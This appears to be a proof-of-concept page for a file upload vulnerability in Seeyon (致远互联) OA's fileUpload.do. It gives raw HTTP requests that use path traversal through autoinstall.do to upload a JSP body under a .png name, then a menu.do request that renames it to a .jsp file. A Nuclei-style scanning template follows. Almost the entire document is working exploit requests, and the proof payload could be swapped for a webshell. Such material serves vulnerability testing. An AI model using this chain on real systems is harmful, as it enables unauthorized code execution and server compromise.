致远互联 OA fileUpload.do 文件上传漏洞

POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1Host: Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-Type: multipart/form-data; boundary=skdHHhNHjhnUgerSexsksboundaryUser-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)--skdHHhNHjhnUgerSexsksboundaryContent-Disposition: form-data; name="type"--skdHHhNHjhnUgerSexsksboundaryContent-Disposition: form-data; name="extensions"png--skdHHhNHjhnUgerSexsksboundaryContent-Disposition: form-data; name="applicationCategory"--skdHHhNHjhnUgerSexsksboundaryContent-Disposition: form-data; name="destDirectory"--skdHHhNHjhnUgerSexsksboundaryContent-Disposition: form-data; name="destFilename"--skdHHhNHjhnUgerSexsksboundaryContent-Disposition: form-data; name="maxSize"--skdHHhNHjhnUgerSexsksboundaryContent-Disposition: form-data; name="isEncrypt"false--skdHHhNHjhnUgerSexsksboundaryContent-Disposition: form-data; name="file1"; filename="1.png"Content-Type: Content-Type: application/pdf<% out.println("hello test");%>--skdHHhNHjhnUgerSexsksboundary--

POST /seeyon/autoinstall.do/../../seeyon/privilege/menu.do HTTP/1.1Host: Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2Content-type: application/x-www-form-urlencodedUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; Acoo Browser; SLCC1; .NET CLR 2.0.50727; Media Center PC 5.0; .NET CLR 3.0.04506)method=uploadMenuIcon&fileid=7866719621757354789&filename=a123.jsp

id: zhiyuanOA-fileUpload-fileuploadinfo:  name: zhiyuanOA-fileUpload-fileupload  author: unknown  severity: high  description: 致远互联 OA fileUpload.do 文件上传漏洞  tags: zhiyuanOA,fileuploadhttp:  - raw:      - |        POST /seeyon/autoinstall.do/../../seeyon/fileUpload.do?method=processUpload HTTP/1.1        Host: {{Hostname}}        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2        Content-Type: multipart/form-data; boundary=skdHHhNHjhnUgerSexsksboundary        User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN) AppleWebKit/523.15 (KHTML, like Gecko, Safari/419.3) Arora/0.3 (Change: 287 c9dfb30)        Content-Length: 854        --skdHHhNHjhnUgerSexsksboundary        Content-Disposition: form-data; name="type"        --skdHHhNHjhnUgerSexsksboundary        Content-Disposition: form-data; name="extensions"        png        --skdHHhNHjhnUgerSexsksboundary        Content-Disposition: form-data; name="applicationCategory"        --skdHHhNHjhnUgerSexsksboundary        Content-Disposition: form-data; name="destDirectory"        --skdHHhNHjhnUgerSexsksboundary        Content-Disposition: form-data; name="destFilename"        --skdHHhNHjhnUgerSexsksboundary        Content-Disposition: form-data; name="maxSize"        --skdHHhNHjhnUgerSexsksboundary        Content-Disposition: form-data; name="isEncrypt"        false        --skdHHhNHjhnUgerSexsksboundary        Content-Disposition: form-data; name="file1"; filename="AdsjkHjhggc_adf.png"        Content-Type: Content-Type: application/pdf        <% out.println("hello test");%>        --skdHHhNHjhnUgerSexsksboundary--    matchers-condition: and    matchers:      - type: word        part: body        words:          - AdsjkHjhggc_adf.png      - type: word        part: body        words:          - fileurls=fileurls      - type: status        status:          - 200